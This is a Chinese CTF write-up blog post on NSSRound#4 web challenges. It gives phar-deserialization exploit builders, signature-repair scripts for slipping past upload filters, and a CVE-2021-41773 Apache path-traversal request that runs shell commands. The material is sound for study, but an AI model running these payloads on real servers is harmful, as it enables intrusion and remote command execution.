首页 > 其他分享 >NSSRound#4 Team

NSSRound#4 Team

时间:2024-07-29 12:59:22浏览次数:18  
标签:文件 NSSRound phar echo 2e flag file Team

[NSSRound#4 SWPU]1zweb

考察:phar的反序列化

1.打开环境,审计代码

1.非预期解

直接用file伪协议读取flag,或直接读取flag

file:///flag
/flag

2.正常解法

用读取文件读取index.php,upload.php的源码 

index.php:

<?php
class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
    public function __construct(){
        $this->ljt="ljt";
        $this->dky="dky";
        phpinfo();
    }
    public function __destruct(){
        if($this->ljt==="Misc"&&$this->dky==="Re")
            eval($this->cmd);
    }
    public function __wakeup(){
        $this->ljt="Re";
        $this->dky="Misc";
    }
}
$file=$_POST['file'];
if(isset($_POST['file'])){
    echo file_get_contents($file);
}

upload.php

<?php
if ($_FILES["file"]["error"] > 0){
    echo "上传异常";
}
else{
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
        $content=file_get_contents($_FILES["file"]["tmp_name"]);
        $pos = strpos($content, "__HALT_COMPILER();");
        if(gettype($pos)==="integer"){
            echo "ltj一眼就发现了phar";
        }else{
            if (file_exists("./upload/" . $_FILES["file"]["name"])){
                echo $_FILES["file"]["name"] . " 文件已经存在";
            }else{
                $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
                fwrite($myfile, $content);
                fclose($myfile);
                echo "上传成功 ./upload/".$_FILES["file"]["name"];
            }
        }
    }else{
        echo "dky不喜欢这个文件 .".$extension;
    }
}
?>

ndex.php中只需要绕过_wakeup魔术方法就行了,可以考虑增加自然属性个数或增加属性个数来绕过,因为upload.php会检查stub,所以压缩文件成zip(注意要用winhex改变属性个数,不然签名会改变),用phar://伪协议来读取文件

phar压缩:

<?php
ini_set("phar.readonly","Off"); 
class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
    public function __construct(){
        $this->ljt="Misc";
        $this->dky="Re";
        $this->cmd="system('cat /flag');";
    }
}
$a = new LoveNss();
 
$phar = new Phar('aa.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >');
 
$phar->setMetadata($a);
$phar->addFromString('test.txt', 'test');
$phar->stopBuffering();
 
?>
#注意要手动将php.ini中的phar.readonly改成Off

提交发现文件没有运行,所以考虑可能是压缩文件格式的问题。

用linux命令gzip压缩成gz

cd 工作目录
gzip aa.phar

得到aa.phar.gz,改文件名为1.jpg上交,用phar读取发现签名损坏,所以要进行签名修复,phar由data,data签名(20位),和签名格式(8位)组成

修复脚本:

from hashlib import sha1
 
import gzip
 
file = open(r'C:\networkSafe\phpstudy_pro\WWW\aa.phar', 'rb').read()
 
data = file[:-28]  # 获取需要签名的数据
# data = data.replace(b'3:{', b'4:{') #更换属性值,绕过__wakeup
 
final = file[-8:]  # 获取最后8位GBMB标识和签名类型
 
newfile = data + sha1(data).digest() + final  # 数据 + 签名 + 类型 + GBMB
 
open(r'C:\networkSafe\phpstudy_pro\WWW\new.phar', 'wb').write(newfile)  # 写入到新的phar文件
 
newf = gzip.compress(newfile)
with open(r'C:\networkSafe\phpstudy_pro\WWW\2.jpg', 'wb') as file: #更改文件后缀
     file.write(newf)

最后上交修改后的2.jpg得到flag 

[NSSRound#4 SWPU]ez_rce

考察:CVE-2021-41773目录穿越漏洞

Apache 披露了一个在 Apache HTTP Server 2.4.49 上引入的漏洞,称为 CVE-2021-41773。同时发布了2.4.50更新,修复了这个漏洞。该漏洞允许攻击者绕过路径遍历保护,使用编码并读取网络服务器文件系统上的任意文件。

brup构造如下数据包, 

POST /cgi-bin/test-cgi/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh

重点在/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh%2e.的url编码,所以这一段其实就是/cgi-bin/../../../../bin/sh

echo;xxx则是命令执行 

 获取flag信息

跟进/flag_is_here发现还有文件夹

这里我们用grep来进行过滤来读flag

echo;grep -r "NSS" /flag_is_here

[NSSRound#4 SWPU]1zweb(revenge)

考察:php代码审计,文件读取漏洞,文件上传绕过,phar协议反序列化漏洞

首先有一个查询文件的功能和一个文件读取的功能,一开始以为是文件上传的漏洞,后面发现不行,应该是网站在后端限制了文件上传的后缀,观察到这里有个文件查询的功能应该是文件读取,试一下直接读flag

读取flag失败,那我们就先读取一下源码index.php

<?php
class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
    public function __construct(){
        $this->ljt="ljt";
        $this->dky="dky";
        phpinfo();
    }
    public function __destruct(){
        if($this->ljt==="Misc"&&$this->dky==="Re")
            eval($this->cmd);
    }
    public function __wakeup(){
        $this->ljt="Re";
        $this->dky="Misc";
    }
}
$file=$_POST['file'];
if(isset($_POST['file'])){
    if (preg_match("/flag/", $file)) {
    	die("nonono");
    }
    echo file_get_contents($file);
}

发现跟之前题目有点相像

因此猜想这里应该是利用了phar协议的反序列化来拿flag

Phar反序列化
Phar之所以能反序列化,是因为Phar文件会以序列化的形式存储用户自定义的meta-data,PHP使用phar_parse_metadata在解析meta数据时,会调用php_var_unserialize进行反序列化操作

再看看upload.php文件

<?php
if ($_FILES["file"]["error"] > 0){
    echo "上传异常";
}
else{
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
        $content=file_get_contents($_FILES["file"]["tmp_name"]);
        $pos = strpos($content, "__HALT_COMPILER();");
        if(gettype($pos)==="integer"){
            echo "ltj一眼就发现了phar";
        }else{
            if (file_exists("./upload/" . $_FILES["file"]["name"])){
                echo $_FILES["file"]["name"] . " 文件已经存在";
            }else{
                $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
                fwrite($myfile, $content);
                fclose($myfile);
                echo "上传成功 ./upload/".$_FILES["file"]["name"];
            }
        }
    }else{
        echo "dky不喜欢这个文件 .".$extension;
    }
}
?>

可以看到首先是对文件后缀的限制,然后是对phar文件里的_HALT_COMPILER();进行匹配,这个函数是phar文件的标志性函数,这种限制手法是有漏洞的,可以绕过的,我们可以将phar文件用linux的gzip进行压缩来加密它,以此来绕过此检测,在上面的魔术方法的图里看到了wakeup函数,在php低版本里,可以通过修改属性个数大于实际属性个数,来绕过wakeup函数,但是因为phar文件生成时是自动进行序列化的,所以我们我们需要修改文件,phar文件生成时会进行签名,来防止被修改,所以修改文件后我们需要对phar文件重新签名,phar文件有几种不同的加密签名选择,默认签名方法应该是要看生成phar文件的php版本

构造恶意phar文件

<?php
class LoveNss{
    public $ljt="Misc";
    public $dky="Re";
    public $cmd="system('ls /');";
}
 
$a = new LoveNss();
 
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($a); //自定义的meta-data
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算,默认是SHA1
$phar->stopBuffering();

生成phar文件,要绕过__wakeup方法,手动修改反序列化的数量

这里修改了反序列的数量后,绕过了__wakeup()方法,但是修改之后,签名确保完整性就不对了,所以还要重新进行签名,默认是SHA-1算法,那么就用SHA-1算法吧

from hashlib import sha1
 
file = open('phar.phar', 'rb').read()
 
data = file[:-28]#要签名的部分是文件头到metadata的数据。
 
final = file[-8:]
 
newfile = data+sha1(data).digest()+final
 
open('newpoc.phar', 'wb').write(newfile)

 

生成了phar文件后,进行压缩看看是否能使__HALT_COMPILER()消失

确实不存在了,那么将zip文件修改了合适的后缀,上传应该就可以了吧,直接上传,使用phar://伪协议应该就可以了吧 

但是呢Phar伪协议确实执行了解压,但是eval()函数似乎没有执行的命令内容呢,不符合预期的解,再重新试了几遍,发现结果都一样。想了一想,签名生成应该不会有问题,Phar能够进行解压缩,说明重新签名应该也不会有问题,有没有可能是zip压缩的问题,换一种压缩试试,换成gzip

继续进行同样的上传和phar://伪协议操作

这里显示要用SHA256加密进行签名,返回去将SHA1修改为SHA256,再进行gzip后,再进行相同的操作

标签:文件,NSSRound,phar,echo,2e,flag,file,Team
From: https://blog.csdn.net/2302_78903258/article/details/140762949

相关文章

  • Team center表格开发样例 --转自PLMCode
    第一步:分别在自己的模块下的html、viewmodel、js文件夹下,加入下列三个文件simpleTableTestPageTableView.html、simpleTableTestPageTableViewModel.json、simpleTableTestPageService.js第二步:simpleTableTestPageTableView.html<aw-splm-tablegridid="exampleTable"></aw-spl......
  • Team - IT组织意识
    从IT运维到IT运营主动式运维相比被动式运维,其关键在于从被动解决问题变为主动防控风险,在于持续总结优化,将运维活动延伸到系统运行全周期,形成改进闭环。通过总结、反馈、优化等活动避免问题再次发生。具体体现在从“从IT运维到IT运营”的转变。传统的IT运维管理更多是被动式“......
  • steam休闲游戏推荐:《Mimpi Dreams》《Pizza Possum》《洞窟物语》
    对于想要放松娱乐的时刻,Steam平台上有一些非常受欢迎的休闲游戏,这里推荐三款:1、《Mimpi Dreams》《Mimpi Dreams》中文名为《米皮大冒险:梦境》,是一款由 Silicon Jelly 开发的冒险解谜游戏。该游戏的故事承接前作,小狗米皮在成功找到主人并一同回家后,某天夜晚受到梦魇的......
  • 黑暗之魂2缺失steam_api.dll该如何处理?全面解读《黑暗之魂2》steam_api.dll丢失及高效
    在游戏的世界中,《黑暗之魂2》凭借其独特的魅力吸引了众多玩家。然而,有时玩家会遭遇steam_api.dll文件丢失的困扰,这无疑给游戏体验带来了极大的阻碍。在这篇文章中,我们将为您进行全面解读。首先深入剖析steam_api.dll文件丢失的原因。可能是由于游戏安装过程中的错误、系统更新......
  • 为什么 SteamworksPy 无法加载/检索数据?
    importctypesimportglobimportosfromsteamworksimportSTEAMWORKSfromsteamworks.exceptionsimportSteamNotRunningExceptionclassSteamClass:def__init__(self):#SpecifythedirectorycontainingtheDLLs(usecurrentworkingdirec......
  • Team - 基于 Jira的敏捷管理
    基于Jira的敏捷管理产品Backlog梳理创建用户故事、独立任务和子任务:对应的项目产品PO和Master创建用户故事;对应的敏捷团队成员创建自己的独立任务和子任务用户故事拆分与估算:PO或Master将用户故事拆分和估算的结果按照用户故事”三段论”录入Jira。进入产品Backlog中......
  • Team - 协同工具Jira
    Jira官网信息Jira简介https://www.atlassian.com/zh/software/jira/guides/getting-started/introductionJira入门教程:6个基本步骤https://www.atlassian.com/zh/software/jira/guides/getting-started/basics视频教程敏捷必备工具Jira&Confluence使用http://ww......
  • 需要帮助使用 Selenium Python 单击 Microsoft Teams 按钮
    我将Python与Selenium结合使用,并自动登录MicrosoftTeams。进入后,弹出窗口显示我需要单击“立即切换”以切换到V2版本。我似乎无法使用SeleniumPython成功单击此按钮。谁能帮我自动点击这个按钮?这是我不成功的尝试:self.driver.find_element(By.CLASS_NAME,......
  • Teamcenter AWC开发,代码报错Error: Cannot read properties of undefined (reading 'h
    1、调用setProperties接口报错awaitsoaSvc.post('Core-2010-09-DataManagement','setProperties',info)Error:Cannotreadpropertiesofundefined(reading'hasOwnProperty')atObject.createError(soaService.js:486:1)ateval......
  • 2024年steam好玩的新游:《哈迪斯2》《雨中冒险: 回归》等
    今天已经有不少新游上线,下面为大家整理了2024年好玩的steam游戏,一起来看看。2024值得一玩的新游1、《哈迪斯2》哈迪斯2(HadesII)是SupergiantGames继其广受好评的作品《哈迪斯》之后开发的一款动作角色扮演游戏。在《哈迪斯》中,玩家扮演冥王哈迪斯的儿子扎格列欧斯,试图逃......